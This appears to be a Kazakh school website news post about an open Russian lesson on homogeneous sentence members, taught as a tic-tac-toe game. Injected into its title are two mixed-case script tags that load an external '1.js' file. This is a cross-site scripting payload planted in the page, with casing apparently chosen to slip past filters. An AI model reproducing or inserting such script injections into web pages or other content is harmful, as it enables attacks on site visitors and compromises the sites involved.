Орыс тілінен ашық сабақ.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.04.2022

Гуманитарлық пәндер аясында, 14 сәуір күні орыс тілінен "Бірыңғай мүшелері бар жай сөйлем" тақырыбында сабақ өтті. Сабақ "Крестики-нолики" ойын түрінде өткізілді. Оқушылар сабақ бойы тапсырмаларды орындады және өз жетістіктерін "Ойын алаңында" белгіледі. "Крестики-нолики" ойынының принципін пайдалану оқушының оқу процесіндегі белсенділікті, өзін-өзі бақылау дағдыларын қалыптастырады, білім берудің тиімділігін арттырудың бірден бір шарты болып табылады, оқушылардың танымдық қабілетін дамытады. Бұл шеберлік оқушыларда өз іс-әрекетіне  сенімділік сияқты маңызды қасиеттерді тәрбиелейді, сол сияқты оқуға қызығушылығын арттырады. Сабақтың соңында оқушылар өздерін "Бағдаршамның" жолақтары арқылы бағалады.

Просмотров: 298


Пікір қосу



Деректерді қолтаңбаға қосу